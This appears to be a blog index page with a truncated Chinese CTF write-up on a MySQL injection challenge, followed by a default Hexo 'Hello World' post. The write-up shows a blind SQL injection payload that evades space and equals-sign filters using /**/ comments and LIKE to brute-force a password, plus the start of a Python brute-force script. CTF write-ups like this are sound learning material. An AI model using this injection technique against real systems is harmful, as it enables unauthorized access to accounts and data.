NSSCTF [第五空间2021]yet_another_mysql_injection,[HNCTF 2022 WEEK2]ez_ssrf
NSSCTF[NSSROUND 8]yet_another_mysql_injection一共两种解法,爆破密码 和 quine注入,本文只介绍第一种方法,第二种方法网上也有很多脚本 知识: % 只在 SQL 的 LIKE 语句中生效 _ 只匹配一个字符 在sql里面匹配前一个字符x次 爆破密码password经过尝试,发现过滤了空格和等号,用/**/和like来绕过,一个字母一个字母来爆破,构建查询语句: 1'or/**/password/**/like/**/'{flag+i}%'# #的作用是匹配还未爆破到的密码,如果用*则只能匹配单个字母,所以用#匹配后面所有的字符 脚本: 123456789101112131415161718192021import requestsimport timestr = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+-=[]{...
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post1$ hexo new "My New Post" More info: Writing Run server1$ hexo server More info: Server Generate static files1$ hexo generate More info: Generating Deploy to remote sites1$ hexo deploy More info: Deployment